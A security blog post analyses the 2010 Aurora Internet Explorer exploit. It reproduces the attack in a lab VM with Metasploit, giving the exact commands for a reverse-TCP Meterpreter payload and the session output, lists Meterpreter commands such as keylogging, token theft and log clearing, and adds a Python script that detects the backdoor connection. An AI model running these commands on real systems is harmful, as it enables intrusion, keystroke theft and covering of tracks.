Sicurezza IT proattiva

Aurora Attack - Zero day exploit in IE6

2010-02-04 [Exploit analysis]

The Aurora attack, which is believed to have originated from China, is a major attack of the recent past: it used an Internet Explorer exploit to attack companies such as Google and Adobe and succeeded in stealing intellectual property.

According to Microsoft, the vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.

So far the vulnerability has been exploited on IE 6. It can also be exploited on IE 7, but this has not yet been done because of memory layout differences in IE 7. Exploit code has been published on the Internet and can be used by anyone to craft similar attacks. Metasploit, an open-source penetration-testing framework, has also released a working exploit for the vulnerability, which is explained in detail in the last section.

Microsoft lists the following mitigating factors for this vulnerability:

  • Data Execution Prevention (DEP) is enabled by default in Internet Explorer 8 on the following Windows operating systems: Windows XP Service Pack 3, Windows Vista Service Pack 1, Windows Vista Service Pack 2, and Windows 7.
  • Protected Mode in Internet Explorer on Windows Vista and later Windows operating systems limits the impact of the vulnerability.
  • In a Web-based attack scenario, an attacker could host a Web site that contains a Web Page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
  • An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.
  • By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone.
  • By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the restricted sites zone. The Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.

Exploiting the Vulnerability:

We tried to reproduce the attack scenario using Metasploit and were able to do it successfully. It was quite scary to see how the exploit works and how easy it is for a hacker to control the vulnerable system.

Software used for the attack and analysis:

  • Metasploit Framework
  • 2 networked VMware images running Windows XP with SP2
  • TCPView

We set up Metasploit in one VMware image to run as the server that controls the hacked system, by issuing the following commands:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.1.30
LHOST => 192.168.1.30
msf exploit(ie_aurora) > set LPORT 6666
LPORT => 6666
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > exploit

This was the response, showing that the server had started:

[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started reverse handler on port 6666
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.30:8080/
[*] Server started.

We then opened Internet Explorer on the vulnerable system (the other VMware image running Windows XP with SP2), entered the IP address of the server (192.168.1.30 in our case) in the browser, and got the following response at the server end:

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)

We then had to issue the following command to start interacting with the exploited system:

sessions -i 1
[*] Starting interaction with 1...

Examining the exploited system:

We checked the ports on the exploited system and found the backdoor opened by the exploit. A screenshot of the backdoor can be seen below:

 

The port opened by Internet Explorer, which serves as the backdoor in this scenario, can be seen in fig 1.1.

There are no other visible indications that the computer has been compromised and can be controlled from a remote server.
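The one indicator that does survive is the one in fig 1.1: the browser process holding a TCP connection to a port that has nothing to do with web browsing. The script below is an added example, not code from the original post or from Metasploit. It parses netstat -ano style output together with a PID-to-process map (the two pieces of information TCPView shows side by side) and flags browser processes with established connections to ports outside the normal web ports. The netstat lines and the PID map are constructed to mirror the session above: the exploit page fetched from 192.168.1.30:8080 and the payload's connection back to 192.168.1.30:6666.

```python
"""Flag browser processes holding TCP connections to unusual remote ports.

Added example (not part of the original post): parses the output format of
``netstat -ano`` on Windows XP together with a PID-to-image-name map (as
``tasklist`` or the TCPView process column would give) and reports
connections that look like the reverse-TCP session in fig 1.1: a browser
process talking to a remote port that is not a normal web port.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Processes that should only ever talk HTTP(S) to the outside world.
BROWSER_IMAGES = {"iexplore.exe", "firefox.exe", "chrome.exe"}

# Remote ports a browser is expected to use. 8080 is included because the
# exploit page in the write-up was served from http://192.168.1.30:8080/ and
# that request alone is indistinguishable from normal browsing.
EXPECTED_WEB_PORTS = {80, 443, 8080}

# One TCP netstat line: proto, local addr:port, remote addr:port, state, pid.
_NETSTAT_LINE = re.compile(
    r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$"
)

# (image name, pid, remote ip, remote port, connection state)
Finding = Tuple[str, int, str, int, str]


def parse_netstat(text: str) -> List[dict]:
    """Turn ``netstat -ano`` text into records; headers and UDP lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _NETSTAT_LINE.match(line)
        if not m:
            continue
        _, lip, lport, rip, rport, state, pid = m.groups()
        records.append({
            "local": (lip, int(lport)),
            "remote": (rip, int(rport)),
            "state": state,
            "pid": int(pid),
        })
    return records


def find_suspicious_browser_connections(
    netstat_text: str,
    pid_to_image: Dict[int, str],
    expected_ports: Iterable[int] = EXPECTED_WEB_PORTS,
) -> List[Finding]:
    """Return established connections from browser PIDs to unexpected ports."""
    expected = set(expected_ports)
    findings: List[Finding] = []
    for rec in parse_netstat(netstat_text):
        image = pid_to_image.get(rec["pid"], "").lower()
        if image not in BROWSER_IMAGES:
            continue
        if rec["state"] != "ESTABLISHED":
            continue
        rip, rport = rec["remote"]
        if rport in expected:
            continue  # ordinary web traffic, such as fetching the exploit page
        findings.append((image, rec["pid"], rip, rport, rec["state"]))
    return findings


# Constructed sample output modelled on the session in the write-up:
# PID 1520 is Internet Explorer, which first fetched the page on port 8080
# and then, once the payload ran, connected back to the handler on port 6666.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.57:1037      192.168.1.30:8080      ESTABLISHED     1520
  TCP    192.168.1.57:1038      192.168.1.30:6666      ESTABLISHED     1520
  TCP    192.168.1.57:1039      192.168.1.30:6666      TIME_WAIT       0
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed PID map (what ``tasklist`` or the TCPView process column shows).
SAMPLE_PIDS = {912: "svchost.exe", 1520: "iexplore.exe", 4: "System"}

if __name__ == "__main__":
    for image, pid, rip, rport, state in find_suspicious_browser_connections(
        SAMPLE_NETSTAT, SAMPLE_PIDS
    ):
        print(f"{image} (pid {pid}) -> {rip}:{rport} [{state}]")
```

On a real host, feed the script the output of netstat -ano and a map built from tasklist. The request to port 8080 is deliberately not reported, because a browser fetching a page over HTTP is exactly what a browser does; only the second connection from the same process to port 6666, which is the Meterpreter session, stands out.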

Controlling the Exploited Computer:

It’s really scary to see how a hacked computer can be controlled. An example of the shell being controlled from the server can be seen below:

 

The following Meterpreter commands can be used to control the hacked system, including the shell command that drops into a system command shell.

Core Commands
=============

Command       Description
-------       -----------
?             Help menu
background    Backgrounds the current session
channel       Displays information about active channels
close         Closes a channel
exit          Terminate the meterpreter session
help          Help menu
interact      Interacts with a channel
irb           Drop into irb scripting mode
migrate       Migrate the server to another process
quit          Terminate the meterpreter session
read          Reads data from a channel
run           Executes a meterpreter script
use           Load a one or more meterpreter extensions
write         Writes data to a channel

Stdapi: File system Commands
============================

Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
del           Delete the specified file
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
-------       -----------
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table

Stdapi: System Commands
=======================

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getpid        Get the current process identifier
getprivs      Get as many privileges as possible
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command         Description
-------         -----------
enumdesktops    List all accessible desktops and window stations
idletime        Returns the number of seconds the remote user has been idle
keyscan_dump    Dump they keystroke buffer
keyscan_start   Start capturing keystrokes
keyscan_stop    Stop capturing keystrokes
setdesktop      Move to a different workstation and desktop
uictl           Control some of the user interface components

References

http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.microsoft.com/technet/security/advisory/979352.mspx